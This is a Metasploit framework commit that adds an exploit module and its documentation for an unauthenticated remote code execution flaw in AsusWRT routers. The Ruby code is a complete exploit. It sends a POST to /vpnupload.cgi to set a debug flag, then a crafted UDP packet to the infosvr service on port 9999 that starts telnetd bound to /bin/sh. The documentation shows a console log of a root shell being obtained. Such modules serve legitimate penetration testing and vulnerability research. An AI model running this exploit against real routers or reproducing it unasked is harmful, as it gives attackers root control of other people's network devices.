Land rapid7#9441, Create exploit for AsusWRT LAN RCE

Merge branch 'land-9441' into upstream-master

Author: bwatters-r7

documentation/modules/exploit/linux/http/asuswrt_lan_rce.md

@@ -0,0 +1,70 @@
+## Description
+
+  This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`.
+
+
+## Vulnerable Application
+
+  The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode.
+
+  This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user.
+
+  This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.
+
+  Numerous ASUS models are reportedly affected, but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploits/linux/http/asuswrt_lan_rce`
+  3. `set RHOST [IP]`
+  4. `run`
+  5. You should get a *root* session
+
+
+## Options
+
+  **ASUSWRTPORT**
+
+  AsusWRT HTTP portal port (default: `80`)
+
+
+## Scenarios
+msf > use exploit/linux/http/asuswrt_lan_rce
+msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
+rhost => 192.168.132.205
+msf exploit(linux/http/asuswrt_lan_rce) > run
+
+[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
+[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
+[+] 192.168.132.205:9999 - Success, shell incoming!
+[*] Found shell.
+[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600
+
+id
+id
+/bin/sh: id: not found
+/ # cat /proc/cpuinfo
+cat /proc/cpuinfo
+system type             : Broadcom BCM53572 chip rev 1 pkg 8
+processor               : 0
+cpu model               : MIPS 74K V4.9
+BogoMIPS                : 149.91
+wait instruction        : no
+microsecond timers      : yes
+tlb_entries             : 32
+extra interrupt vector  : no
+hardware watchpoint     : yes
+ASEs implemented        : mips16 dsp
+shadow register sets    : 1
+VCED exceptions         : not available
+VCEI exceptions         : not available
+
+unaligned_instructions  : 0
+dcache hits             : 2147483648
+dcache misses           : 0
+icache hits             : 2147483648
+icache misses           : 0
+instructions            : 2147483648
+/ #

modules/exploits/linux/http/asuswrt_lan_rce.rb

@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AsusWRT LAN Unauthenticated Remote Code Execution',
+      'Description'    => %q{
+      The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to
+      perform a POST in certain cases. This can be combined with another vulnerability in
+      the VPN configuration upload routine that sets NVRAM configuration variables directly
+      from the POST request to enable a special command mode.
+      This command mode can then be abused by sending a UDP packet to infosvr, which is running
+      on port UDP 9999 to directly execute commands as root.
+      This exploit leverages that to start telnetd in a random port, and then connects to it.
+      It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <[email protected]>'         # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],
+          ['CVE', '2018-5999'],
+          ['CVE', '2018-6000']
+        ],
+      'Targets'        =>
+        [
+          [ 'AsusWRT < v3.0.0.4.384.10007',
+            {
+              'Payload'        =>
+                {
+                  'Compat'  => {
+                    'PayloadType'    => 'cmd_interact',
+                    'ConnectionType' => 'find',
+                  },
+                },
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+      'DisclosureDate'  => 'Jan 22 2018',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(9999)
+      ])
+
+    register_advanced_options(
+      [
+        OptInt.new('ASUSWRTPORT', [true,  'AsusWRT HTTP portal port', 80])
+      ])
+  end
+
+  def exploit
+    # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD
+    # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"")
+
+    data = post_data.to_s
+
+    res = send_request_cgi({
+      'uri'    => "/vpnupload.cgi",
+      'method' => 'POST',
+      'rport'  => datastore['ASUSWRTPORT'],
+      'data'   => data,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+    })
+
+    if res and res.code == 200
+      print_good("#{peer} - Successfully set the ateCommand_flag variable.")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.")
+    end
+
+
+    # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.
+    info_pdu_size = 512                         # expected packet size, not sure what the extra bytes are
+    r = Random.new
+
+    ibox_comm_pkt_hdr_ex  =
+        [0x0c].pack('C*') +                     # NET_SERVICE_ID_IBOX_INFO  0xC
+        [0x15].pack('C*') +                     # NET_PACKET_TYPE_CMD 0x15
+        [0x33,0x00].pack('C*') +                # NET_CMD_ID_MANU_CMD 0x33
+        r.bytes(4) +                            # Info, don't know what this is
+        r.bytes(6) +                            # MAC address
+        r.bytes(32)                             # Password
+
+    telnet_port = rand((2**16)-1024)+1024
+    cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*')
+    pkt_syscmd =
+        [cmd.length,0x00].pack('C*') +          # cmd length
+        cmd                                     # our command
+
+    pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)
+
+    connect_udp
+    udp_sock.put(pkt_final)                     # we could process the response, but we don't care
+    disconnect_udp
+
+    print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}")
+    sleep(10)
+
+    begin
+      ctx = { 'Msf' => framework, 'MsfExploit' => self }
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })
+      if not sock.nil?
+        print_good("#{peer} - Success, shell incoming!")
+        return handler(sock)
+      end
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      sock.close if sock
+    end
+
+    print_bad("#{peer} - Well that didn't work... try again?")
+  end
+end